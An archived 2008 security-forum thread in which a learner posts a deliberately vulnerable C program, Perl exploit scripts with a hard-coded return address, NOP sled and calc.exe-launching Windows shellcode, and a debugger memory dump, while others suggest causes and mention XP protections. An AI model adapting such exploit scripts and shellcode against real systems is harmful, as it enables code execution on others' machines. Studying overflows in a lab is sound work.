Title: Issues injecting shellcode
Post by: NickFnord on October 29, 2008, 07:42:25 PM
Hi All, I've recently been mucking about with buffer overflows, and I've had this question hanging for a while - just wondered if anyone could point me in the right direction: Sample vulnerable code in question: overflowme.c #include <stdio.h>
#include <string.h>
void copyme(char *input[])
{
char name[256];
strcpy(name,input);
}
int main(int argc, char **argv)
{
char intro[214]; //simulate stack
copyme(argv[1]);
return 0;
}
Sample Exploit in question: #!/usr/local/bin/perl
$buffer = "A"x256; #fills up the variable space
$buffer .= "A"x4; #should overwrite the ebp address
$retadd .= "\x7B\x46\x86\x7C"; #should overwrite the return address with 7C86467B
$nopsled .= "\x90"x7;
$shellcode = #calls calc.exe
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";
#optional line to debug with olly
#exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$buffer$retadd$nopsled$shellcode\"";
exec "./overflowme.exe \"$buffer$retadd$nopsled$shellcode\"";
This exploit script works fine. what I'm trying to do is attempt to inject the shellcode prior to the return address as an excercise in manually manipulating the registers later on. e.g. inject shellcode fill out the rest of the buffer overwrite return address manipulate register to point to beginning of shellcode jump to register but the problem I'm having is that the shellcode is not being copied to the stack - here's what I'm trying to run: #!/usr/local/bin/perl
$buffer = "A"x92; #fills up the variable space
$buffer .= "A"x4; #should overwrite the ebp address
$buffer .= "\x7B\x46\x86\x7C"; #should overwrite the return address with 7C86467B
$buffer .= "\x90"x7;
$buffer .= "A"x100; #should be easily visable past the ret point
$nopsled .= "\x90"x7;
$shellcode .= #164 bytes
"\x2b\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe2".
"\x61\xf1\x91\x83\xeb\xfc\xe2\xf4\x1e\x89\xb5\x91\xe2\x61\x7a\xd4".
"\xde\xea\x8d\x94\x9a\x60\x1e\x1a\xad\x79\x7a\xce\xc2\x60\x1a\xd8".
"\x69\x55\x7a\x90\x0c\x50\x31\x08\x4e\xe5\x31\xe5\xe5\xa0\x3b\x9c".
"\xe3\xa3\x1a\x65\xd9\x35\xd5\x95\x97\x84\x7a\xce\xc6\x60\x1a\xf7".
"\x69\x6d\xba\x1a\xbd\x7d\xf0\x7a\x69\x7d\x7a\x90\x09\xe8\xad\xb5".
"\xe6\xa2\xc0\x51\x86\xea\xb1\xa1\x67\xa1\x89\x9d\x69\x21\xfd\x1a".
"\x92\x7d\x5c\x1a\x8a\x69\x1a\x98\x69\xe1\x41\x91\xe2\x61\x7a\xf9".
"\xde\x3e\xc0\x67\x82\x37\x78\x69\x61\xa1\x8a\xc1\x8a\x91\x7b\x95".
"\xbd\x09\x69\x6f\x68\x6f\xa6\x6e\x05\x02\x90\xfd\x81\x4f\x94\xe9".
"\x87\x61\xf1\x91";
exec "c:\\stuff\\tools\\odbg110\\ollydbg ./overflowme.exe \"$nopsled$shellcode$buffer\"";
#exec "./overflowme.exe \"$nopsled$shellcode$buffer\"";
at the command that copies to the register: 0040152E |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
everything passed into the program is present in the heap: 00144C78 90 90 90 90 90 90 90 2B C9 83 E9 DD D9 EE D9 74 +Ƀt
00144C88 24 F4 5B 81 73 13 E2 61 F1 91 83 EB FC E2 F4 1E $[s�a�
00144C98 89 B5 91 E2 61 7A D4 DE EA 8D 94 9A 60 1E 1A AD azꍔ`��
00144CA8 79 7A CE C2 60 1A D8 69 55 7A 90 0C 50 31 08 4E yz`�iUz.P1�N
00144CB8 E5 31 E5 E5 A0 3B 9C E3 A3 1A 65 D9 35 D5 95 97 1 ;�e5Օ
00144CC8 84 7A CE C6 60 1A F7 69 6D BA 1A BD 7D F0 7A 69 z`�im�}zi
00144CD8 7D 7A 90 09 E8 AD B5 E6 A2 C0 51 86 EA B1 A1 67 }z.譵Q걡g
00144CE8 A1 89 9D 69 21 FD 1A 92 7D 5C 1A 8A 69 1A 98 69 i!�}\�i�i
00144CF8 E1 41 91 E2 61 7A F9 DE 3E C0 67 82 37 78 69 61 Aaz>g7xia
00144D08 A1 8A C1 8A 91 7B 95 BD 00 69 6F 68 6F A6 6E 05 {.iohon�
00144D18 02 90 FD 81 4F 94 E9 87 61 F1 91 41 41 41 41 41 �OaAAAAA
00144D28 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00144D38 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00144D48 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00144D58 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00144D68 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
00144D78 41 41 41 41 41 41 41 41 41 41 41 7B 46 86 7C 90 AAAAAAAAAAA{F|
00144D88 90 90 90 90 90 90
..etc
but at this point the ecx register is set to 99h (153) which means it will copy up to the \x09 on the second last line of the shellcode and then stop. - looking at the heap, it seems that the shellcode has been corrupted somewhat as that character is now a null. 09h is a tab character - would the commandline be interpreting it as a null char? I wouldn't have thought so and in any case, there's another one in the heap at 00144CD8+3. What's going on here?
Title: Re: Issues injecting shellcode
Post by: ChrisG on October 30, 2008, 07:22:37 AM
what OS?
Title: Re: Issues injecting shellcode
Post by: NickFnord on October 30, 2008, 08:47:29 AM
sorry about that part: XP home or pro all service packed - at work at the moment and can't remember which of my home computers has which.
the shellcode calls calc.exe.
Title: Re: Issues injecting shellcode
Post by: phn1x on October 30, 2008, 11:03:51 AM
strcpy shouldnt be having any issues interpreting the tab character.
However, your bigger issue is working on a fully patched system running XP. If you are just starting out might I suggest using either Windows 2000, or a linux system and disable the stack protection.
Your hinderence is going to be the protections on XP, it's definately not a good "learning overflows" platform.
Title: Re: Issues injecting shellcode
Post by: NickFnord on October 30, 2008, 11:45:51 AM
The issue is definately not with the strcpy function. the code appears to be modified as it is placed on the heap, not as it is being copied to the stack.
I would have thought that since I can inject the exact same shellcode after the return address, the version of windows I'm running should be almost irrelevant.
in anycase - I'm trying to understand why the shellcode gets changed - in particular, why it only gets changed when I inject it prior to the return point. moving to another operating system will not help me answer that question.
Title: Re: Issues injecting shellcode
Post by: Craig on October 31, 2008, 03:50:06 PM
I can't tell you for sure what is happening, but I would suspect that since your tab character is being corrupted before the strcpy() then it is probably an issue with how the command line argument is being processed. I would try reading the shellcode out of a file or through a socket and see if that fixes the issue. If you can narrow the issue down to a problem with passing the shell code via the command line, then that at least will help narrow down your Google search... :)
Title: Re: Issues injecting shellcode
Post by: tntcoda on November 01, 2008, 07:22:39 AM
What are you compiling the program with? If your using visual studio its probably compiling with /GS switch which will build in buffer overrun protections into your code.
Aside from that I would guess its some protections in XP, I don't think XP includes ASLR which would be giving you issues, but im pretty sure it has Data Execution Prevention built in from SP2, maybe this is giving you issues.
I would suggest for learning purposes, go to an unpatched XP SP0 installation, or better a linux box.
|